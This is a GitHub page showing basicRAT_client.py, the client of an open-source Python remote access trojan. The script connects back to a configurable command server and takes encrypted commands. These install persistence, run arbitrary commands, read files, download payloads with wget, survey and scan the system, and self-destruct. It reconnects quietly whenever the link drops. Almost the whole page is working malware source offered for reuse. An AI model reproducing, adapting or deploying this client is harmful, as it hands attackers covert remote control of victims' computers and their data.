-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathbasicRAT_client.py
116 lines (82 loc) · 2.52 KB
/
basicRAT_client.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#!/usr/bin/env python
#
# basicRAT client
# https://github.com/vesche/basicRAT
#
import socket
import sys
import time
from core import *
# change these to suit your needs
HOST = 'localhost'
PORT = 1337
# seconds to wait before client will attempt to reconnect
CONN_TIMEOUT = 30
# determine system platform
if sys.platform.startswith('win'):
PLAT = 'win'
elif sys.platform.startswith('linux'):
PLAT = 'nix'
elif sys.platform.startswith('darwin'):
PLAT = 'mac'
else:
print 'This platform is not supported.'
sys.exit(1)
def client_loop(conn, dhkey):
while True:
results = ''
# wait to receive data from server
data = crypto.decrypt(conn.recv(4096), dhkey)
# seperate data into command and action
cmd, _, action = data.partition(' ')
if cmd == 'kill':
conn.close()
return 1
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(PLAT)
elif cmd == 'quit':
conn.shutdown(socket.SHUT_RDWR)
conn.close()
break
elif cmd == 'persistence':
results = persistence.run(PLAT)
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'survey':
results = survey.run(PLAT)
elif cmd == 'cat':
results = toolkit.cat(action)
elif cmd == 'execute':
results = toolkit.execute(action)
elif cmd == 'ls':
results = toolkit.ls(action)
elif cmd == 'pwd':
results = toolkit.pwd()
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'wget':
results = toolkit.wget(action)
results = results.rstrip() + '\n{} completed.'.format(cmd)
conn.send(crypto.encrypt(results, dhkey))
def main():
exit_status = 0
while True:
conn = socket.socket()
try:
# attempt to connect to basicRAT server
conn.connect((HOST, PORT))
except socket.error:
time.sleep(CONN_TIMEOUT)
continue
dhkey = crypto.diffiehellman(conn)
# This try/except statement makes the client very resilient, but it's
# horrible for debugging. It will keep the client alive if the server
# is torn down unexpectedly, or if the client freaks out.
try:
exit_status = client_loop(conn, dhkey)
except: pass
if exit_status:
sys.exit(0)
if __name__ == '__main__':
main()